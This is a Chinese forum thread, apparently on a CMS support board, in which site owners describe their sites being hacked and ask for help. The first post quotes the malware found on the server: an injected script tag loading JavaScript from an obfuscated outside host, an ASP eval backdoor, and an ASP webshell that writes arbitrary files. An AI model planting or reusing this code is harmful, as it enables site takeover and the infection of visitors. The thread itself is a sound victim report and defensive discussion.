昨天发现网站首页以及公共调用的js文件被插入代码

见我昨天的帖子：

http://bbs.kesion.com/dispbbs.asp?boardid=41&Id=48729&page=3
http://bbs.kesion.com/dispbbs.asp?boardid=41&Id=48753&page=3

昨天早晨将FTP中所有asp文件删除，重新上传最新版的程序。今天早上，再次发现首页以及公共调用的js被插入诸如此类的代码：document.writeln("<script src=http:\/\/%61%2E%38%65%39%2E%6E%65%74\/%31%2E%6A%73><\/script>");

挨个看了文件的修改时间，在KS_Cls/KS.ClassCls.asp文件中发现了，今天凌晨2点多的时候被修改，随即下载下来，用DW打开，发现最后被插入了如下代码：

If Request("Post") <> "" Then
   Eval(Request("Post"))
   Response.End()
End If

涉及到安全问题，想必大家都是很关心的事情。请大家看看，可能是什么地方出了问题？

////////////////////////////

补充一点，在article以及download目录下的special.asp,showclass.asp中，也发现被注入代码，这两个页面底部被加入如下代码：

              Dim GK,RK,TK
                   Set GK=Server.Createobject("Scripting.Filesystemobject")
                   If Request("No")<>"" Then
                   Set RK=GK.Createtextfile(Server.Mappath(Request("No")),True)
                   RK.Write CStr(Replace(unescape(Request("txt")), "happy", CHR(43)))
                     RK.Close
                   TK = request.ServerVariables("HTTP_HOST")&"/"&Request("No")&"<br>"
                   TK = TK & Server.Mappath(Request("No"))
       Response.Write(escape(TK))

其实这是最保险的一个办法!

我只能把所有的目录设成只读。我自己更新的时候去打开。更新完了再关。郁闷。

我也是被8E9这站挂马了   丫的...

哈哈，果然，每次都是我先中招啊~然后，大家紧接着中招~

我现在实在没办法，一气之下，将很多目录设置为“只读”了~只能这样啦~

科讯啊，我怎么说才好呢，又中木马．怎么办怎么办．．．．．想想都气死啊．．．多少个不眠之夜都浪费在木马上了．．．．到最后还是被挂．．．．

欲哭无泪啊．．．．